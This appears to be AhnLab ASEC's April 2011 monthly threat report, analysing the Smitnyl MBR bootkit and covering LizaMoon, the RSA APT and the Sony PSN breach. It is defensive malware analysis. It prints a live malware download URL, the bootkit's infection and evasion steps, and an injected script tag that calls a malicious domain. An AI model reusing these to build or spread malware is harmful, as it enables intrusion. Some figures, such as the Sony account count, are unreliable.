This report is published by ASEC, AhnLab Security Emergency Response Center, and it analyzes the most significant security threats and the latest security technologies against these threats. For further information please visit: www.global.ahnlab.com

(3) Special Feature: Malicious Code Analysis

■ MBR Infector : Smitnyl analysis

The Master Boot Record (MBR) is the first sector of a hard disk. It stores information about installed operating systems. This small section exists outside the storage of a disk’s partitions. It tells the machine how to boot an operating system and where individual partitions are stored. It contains a table of partitions and a code for the program used by the BIOS to boot the system. MBR is not as infected as much as the PE (Portable Executable) file: it is that much more complicated and size-restrictive, and  a tiny error or bug may cause the computer not to boot the operating system. Recently, a new bootkit, Smitnyl Bootkit, was discovered – it is propagating via free file sharing network.

1. Infection and signs of attack

Smitnyl Bootkit saves infection data in the MBR and sectors. It also infects the userinit.exe file when the system restarts to download a malicious file from a designated website. The changes in MBR before and after being infected can be found in the images below:

                
[Fig. 1-27] Original MBR                            

[Fig. 1-28] Infected MBR

The process of the main dropper (Dropper/Smitnyl.37076) can be found in the image below. The payloads to infect MBR, each sector and the userinit.exe file are saved to each resource sector, and the downloader is also divided and saved in two resource sectors.
 

 [Fig. 1-29] Process of main dropper

When the data saved in the resource sectors gets loaded, the MBR, sectors and userinit.exe file will get infected. The process is as below:

1. Saves orginal MBR to the 5th sector.
2. Loads the userinit.exe infector payload to the resource sector (Name=’71’) and saves to 39th sector
3. Loads encoding data to resource sector (Name=’72’) and saves to 45th sector
4. Loads encoding data to resource sector (Name=’6E’) and saves to 46th sector
 When XOR calculation is done with 0x7F, the data saved to the 45th and 46th sectors create an executable file that acts as a downloader
5. Reads 0×200 (512 bytes) of data from resource sector (Name=’70’) and overwrites MBR
6. Reads data (MBR file system infector routine) after 0×200 (512 bytes) of data from resource sector (Name=’70’) and saves it to 32nd sector

The data saved to each sector are used to create downloader or infect userinit.exe during system boot. The userinit.exe file is infected by infecting MBR to bypass detection by antivirus and WFP (Windows File Protection).

2. Function of each module

2.1 Dropper (Dropper/Smitnyl.37076)

The main functions of the dropper, Dropper/Smitnyl.37076, are as below. It first checks whether the Chinese hard disk monitoring tools, HDDGMON.exe and DF5Serv.exe, are running. If they are, it searches for and loads ‘Name=6F’ to the resource saves it under the name of pcidump.sys, beep.sys or DeviceCutter.sys. Then it starts the service of each file.

 
[Fig. 1-30] Functions of dropper

After that it loads the data in the resources to infect the MBR and userinit.exe file, and save it to the designated sectors. It then deletes itself, the dropper, and completes its task.

A. Bypass Windows File Protection

SFC.dll file is a system file checker saved to the %SYSTEM% folder. To create a file in the folder, the dropper uses the SFC.dll file’s 5th function, sfcFileException, to bypass Windows File Protection.

 
[Fig. 1-31] SFC.dll _ sfcFileException function used to bypass Windows File Protection

B. Backup of normal MBR

To infect MBR, the original MBR is backed up in the 5th sector. This is done by reading the MBR and saving it to the stack. 
[Fig. 1-32] Saving 512-byte MBR to stack

SetFilePointer API is used to move the file pointer to the 5th sector and overwrite MBR in the (0xA00 = 2560, 2560/512 = 5th sector) stack.
 
[Fig. 1-33] Backing up original MBR in 5th sector

C. Load data to resource sectors

As mentioned before, the main function of the dropper is to load and save data to resource sectors and create file. The methods to load data are mostly similar. We will look into the method of saving 0×71 resource to the 39th sector. It uses FileResourceA API and looks for the data (Size=0xA00, Address=0×00407050) that falls under the ‘Type = ‘RES’ and Name = ‘71’ to load. Then it uses SetFilePointer API to move the file pointer to the 39th sector and saves as much data as 0xA00 in 0×00407050 loaded to (0x4E00 = 19968, 19968/512 = 39th sector). As WriteFile API is used to write 512 bytes (0×200) each time, it repeats 5 time to finish writing 0xA00.

 
[Fig. 1-34] Saving Type = ‘RES’, Name = ‘71’ resource data to 39th sector

D. Infected MBR

It uses FileResourceA API to search for and load data (Size=0xF2A, Address=0×00406120) falling under Type = ‘RES’ and Name = ‘70’ in the resource sector of the file, and overwrites the MBR sector with the first 512 bytes of data.

 
 [Fig. 1-35] Overwriting data in MBR sector

E. Self-deletion by main dropper
It runs ‘cmd /c del %Main Dropper%\MainDropper.exe > nul’ command to delete itself.

 
[Fig. 1-36] Self-deletion routine

2.2 Infected ‘userinit.exe’ (Win-Trojan/Agent.25600.YE)

The data saved to the main dropper’s resource sector under the name of 71 is written in the 39th sector and overwrites userinit.exe when the system restarts. It decodes and executes the encoded data saved to the 45th sector. If 360Safe exists, it terminates 360safe IE Protection and creates a fake explorer.exe in the Temporary folder (%Temp%) to write the decoded data in the 45th sector. It also runs the real explorer.exe to trick the victim into thinking explorer.exe is running properly.

 
[Fig. 1-37] userinit.exe infection codes saved to 39th sector

A. Termination of 360Safe IE Protection

RegOpenKeyExA API is used to check whether HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon registry exists. If it does, ‘IEProtAccess’ and ‘IEProtNotify’ are set to ‘0’ to terminate 360Safe IE Protection. 360Safe IE Protection is a Chinese antivirus.

 
[Fig. 1-38] Termination of 360Safe IE Protection

B. Creation and execution of explorer.exe

To save fake explorer.exe, it retrieves the Temporary folder location and then accesses the 45th sector and decodes encoded data and creates and runs the fake explorer.exe in the Temporary folder. It also executes the real explorer.exe to trick the victim into thinking explorer.exe is running properly. During the decoding process, it reads 512 bytes of data in the 45th sector and saves it to the stack and conduct XOR calculation with 7F. It corrects the MZ and PE signatures as ‘4D5A’ and ‘5045’ and writes in the fake explorer.exe. It is set to repeat these steps nine times.

[Fig. 1-39] Decoding routine and file change

2.3 Fake explorer.exe (Win-Trojan/Pincav.4608.AT)

The encoded data saved under the name of 72 and 6E in the main dropper’s resource sector is written in the 45th and 46th sectors. The encoded data gets decoded by the saved routine in the 39th sector and creates and runs fake explorer.exe. As shown below, it gets injected into iexplorer.exe to perform download.

 
[Fig. 1-40] Fake explorer.exe’s process

A. Execution of IEXPLORE.EXE with Hidden attribute and self-injection

It retrieves ‘c:\program files\Internet Explorer\IEXPLORE.EXE’ path first and uses WinExec API to run iexplorer.exe with ‘Hidden’ attribute, and gets virtual memory space for the iexplorer.exe run by VirtualAllocEx API to inject itself through WriteProcessMemory API. 
[Fig. 1-41] IEXPLORE.EXE execution and injection

B. File download and execution

It runs the injected codes with ‘CreateRemoteThread’ and downloads http://sb.perfectexe.com/cs.gif and saves it as ‘C:\2008.exe’ and executes it.

 
[Fig. 1-42] File download and execution

3. Process of infected MBR

The main process of “uninfected” MBR is to find the partition to boot from the partition table and call the boot sector of the partition. MBR in an infected system gets BOOT.INI file and WINDOWS and SYSTEM32 directory information to infect userinit.exe, and reads data to infect in the 39th sector to infect userinit.exe.

[Fig. 1-43] Normal operation of MBR   

[Fig. 1-44] Operation of infected MBR

The code routine of infected MBR shows that the malicious code creator does not only understand the MBR structure, but also the FAT and NTFS file system structure to use boot record values, MFT (Master File Table) header and attributes to get the required data. The data obtained is used to ultimately get information on userinit.exe and read the payload saved to the 39th sector to overwrite userinit.exe. A simple way to tell whether the userinit.exe file is infected or not is to check the file information. Information such as the file version will be displayed if the file is uninfected, and not if the file is infected. If you check the raw data with a Hex view tool, you will see 55 AA signature in the 0×28 openset. This signature is used to check whether the malicious code has infected the file.

 
[Fig. 1-45] “Uninfected” userinit.exe and infected userinit.exe

A. Infection of userinit.exe

The final process of infected MBR is to get the starting point and number of the sector to check and read the file and then use ‘Extended Write Function (AH = 43h)’ and read the data saved to the 39th sector in the memory’s ‘0x8C00’  sector. It compares the 0xAA55 signature to check whether the data has been properly read.

[Fig. 1-46] userinit.exe infection routine in infected MBR

4. Workaround

As a result of testing the malicious code with V3 IS 7.0, before the system is infected malware gets detected and removed, but once the system is infected, infected MBR cannot get detected nor repaired. Infected userinit.exe gets detected as Win-Trojan/Agent.25600.YE, but does not get repaired because it is Windows system file, and is monitored by WFP (Windows File Protection). In other words, malicious files that need to be removed get protected. There was a boot virus detection and repair function in V3, but ever since the Defo virus issue on March 2010, the function was removed from the engine. As a makeshift, we are providing an exclusive solution for only our customers whose systems have been infected. This solution compares the partition table of the backed up MBR and infected MBR, and if it is the same, it overwrites the backed up MBR.

5. Conclusion

‘Smitnyl Bootkit’ infects MBR: this could cause serious issues, as it is quite tricky to detect and repair infected MBR. There have not been that many cases reported in Korea, but many victims of this attack might not even know their system is infected. With this, this malware appeals to many attackers. If this malware propagates, it will cause a big stir amongst security companies. Smitnyl Bootkit contains a Chinese hardware monitoring tool and prevents 360Safe, a Chinese antivirus, from running properly. This indicates that the bootkit has been created by Chinese hackers. With this, Chinese online hacking sites and forums should be monitored to get information for researches on the method or other methods to detect and repair boot viruses.

2. Security Trend
(1) Security Statistics

■ Microsoft Security Updates- April 2011

Microsoft released 17 security updates this month.
 
[Fig. 2-1] MS Security Updates

Microsoft released 17 security updates this month – 12 were system vulnerabilities. System vulnerabilities may cause direct attack against the operating system – malicious software does not need to be installed to the system. So, vulnerable systems are more exposed to security threats. The proof of concept is available for two vulnerabilities, and more than 50%, which is 9 security updates, are critical.

(2) Security Issues

■ LizaMoon mass SQL injection

On March 29, a US security provider, Websense, reported a mass SQL injection attack on its blog, “LizaMoon mass injection hits over 226,000 URLs (was 28,000) including iTunes”. This attack hit over 226,000 websites. This attack is called LizaMoon from lizamoon.com that is the doamin name inserted by the attack. We googled this attack to check the amount of damage caused to Korean websites. It did not only attack foreign websites, but also many Korean websites.

 
[Fig. 2-2] Korean websites hacked by LizaMoon SQL injection

11 web pages were used for the attack as below:

<script src=http://[malicious domain]/ur.php></script>

The address inserted into the web page is redirected in three stages as below:

‘http://[malicious domain]/ur.php’
 -> ’http://[XXX.co.cc/scanXX/[number]?sessionId=[numbers]]’
  -> ‘http://[XXX.co.cc/scanXX/[number]/freesystemscan.exe’

The web page connected in the final stage downloads rogue antivirus.
 
[Fig. 2-3] Download of rogue antivirus through three redirections in hacked web page

The files downloaded from the last redirected web page is freesystemscan.exe, and according to ASD (AhnLab Smart Defense), the file size is from 2,343,424 bytes to 2,702,848 bytes. This method of distributing malware through vulnerable websites has been frequently used from years back. You must always update your web browser and system to the latest version to prevent such attack, as it can even been launched via trusted sites. Also, it is important to update your antivirus to the latest version and use SiteGuard that blocks phishing sites and attacks by malware.

V3 detects this malware as:

- Trojan/Win32.FakeAV
- Win-Trojan/Malware.2343424.F
- Win-Trojan/Malware.2332672.D
- Win-Trojan/Malware.2329600.B
- Win-Trojan/Malware.2667520

■ APT attacks RSA

RSA, the security division of EMC suffered a security breach by APT on March 18. RSA issued an ‘Open Letter to RSA Customers’ on its website and pleaded with their clients to take extra caution when using their product. APT is a security threat – it was used in Operation Aurora attack to hack Google on January 2010, Stuxnet to attack an Iranian nuclear power plant on July 2010, and Night Dragon attack launched on a global energy company on February 2011. On April 1, RSA published “Anatomy of an Attack” on its website to describe the attack method in detail.

 
[Fig. 2-4] RSA attack anatomy (Source: EMC/RSA)

1) Spam with the subject “2011 Recruitment Plan” was sent to employees over two days – the personal information of targeted employees was obtained from social network service.

2) 2011 Recruitment plan.xls was attached to the spam – it contained a SWF that exploits the zero-day vulnerability in Adobe Flash Player announced on March 15.

3) The vulnerability is exploited to access user’s machine remotely with Poison Ivy (Trojan horse).

4) The infected system is used to access the internal network and get escalated privileges (administrator’s privileges) to the system.

5) The data of the targeted system is copied to another system and then compressed and encrypted.

6) The compressed and encrypted data gets encrypted and compressed again as RAR and exfiltrated to a hacked third party system via FTP.
The three main steps of this ATP are as follows: gather information of targets via social networking service, infect target’s system with social engineering method and exploit zero-day vulnerability of widely used software. Corporate IT departments must regularly train the staffs and executives about social engineering techniques so that they will pay more attention to signs of irregularity in the internal network and system.

■ 7.7 million account information exfiltrated from Sony PlayStation network

Data was exfiltrated from Sony PlayStation network that holds numerous game account information from all over the world. 420,000 personal information was also exfiltrated from a Korean financial institute, Hyundai Capital, just recently. The number is incomparable with the number of account information that was stolen from Sony PlayStation network – 7.7 million. Unlike other data exfiltration where the name, address, email address, date of birth, user ID, password and login information are stolen, more information was exfiltrated in this attack. With this, Sony removed the network and gamers were not able to download games from the network and play games over the Internet. According to Sony, their network was attack between April 17 and 19, but did not disclose the exact amount of information that was stolen. There is no evidence that credit card information has .been stolen, but there is a possibility. The exfiltrated information could be used maliciously. About 230,000 Korean users were affected, so you are advised to change your password. Because Sony disclosed this attack one week after, there is a possibility of secondary attacks launched against some users. In the past, secondary attacks meant sending off spam mail. For instance, ever since a user’s account information was stolen from Play.com, the user started receiving spam. The stolen information could be used for other malicious means. This method of attack could be launched on other networks, so companies are advised to reinforce their method in protecting their customer’s information safely.
3. Web Security Trend

(1) Web Security Statistics

■ Web Security Summary

[Table 3-1] Website Security Summary

As of April 2011, there were 107,713 reported malicious codes, 704 types of reported malicious code, 720 reported domains with malicious code, and 2,605 reported URLs with malicious code. The type of reported malicious codes and domains and URLs with malicious code decreased, but the number of reported malicious codes increased from last month.

■ Monthly Blocked Malicious URLs
 

 [Fig. 3-1] ] Monthly Blocked Malicious URLs

As of April 2011, the number of reported malicious codes increased 9% from 99,034 the previous month to 107,713.

■ Monthly Reported Types of Malicious Code

 [Fig. 3-2] Monthly Reported Types of Malicious Code

As of April 2011, the number of reported types of malicious code decreased 7% from 759 the previous month to 704.

■ Monthly Domains with Malicious Code

 [Fig. 3-3] Monthly Domains with Malicious Code

As of April 2011, the number of reported domains with malicious code decreased 9% from 780 the previous month to 720.

■ Monthly URLs with Malicious Code
 

[Fig. 3-4] Monthly URLs with Malicious Code

As of April 2011, the number of reported URLs with malicious code decreased 39% from 4,259 the previous month to 2,605.

■ Top Distributed Types of Malicious Code

 [Fig. 3-5] Top Distributed Types of Malicious Code

As of April 2011, adware is the most distributed type of malicious code representing 13.3% (14,371 reports) of the top distributed type of malicious codes, followed by Trojan that represent 7.1% (7,602 reports).

■ Top 10 Distributed Malicious Codes

As of April 2010, Win32/Induc is the most distributed malicious code, with 51,683 cases reported. 3 new malicious codes, including Virus/Win32.Induc, emerged in the top 10 list this month.

(2) Web Security Issues

■ April 2011 Malicious Code Intrusion: Website

[Fig. 3-6] Monthly malicious code intrusion of website

Fig. 3-6 above shows the monthly malicious code intrusion of websites. There has been a stable increase since February. This is because the websites monitored by Honeypot have been intruded and this increased malicious code distribution.

[Table 3-4] Top 10 Malware Distributed Via Compromised Websites

The table above shows the top 10 malware distributed via compromised websites this month. None of the malware is from the previous month – this is because the fast response by antivirus providers have shortened the life span of malware and the  distribution cycle of variants with the same function has become shorter. This month, malware were distributed by:
1. replacing Windows file with malicious file, and
2. exploiting vulnerabilities in Adobe Flash Player.
Refer to the following sites for further details:

- Malware replaces imm32.dll to gain your administrator’s privileges: http://core.ahnlab.com/283
-  Win-Trojan/Agent.30904.H replaces Windows file with malicious file: http://core.ahnlab.com/280
- Malicious flash file targets  your computer: http://core.ahnlab.com/282

The end

• «Previous Post
• Next Post »

---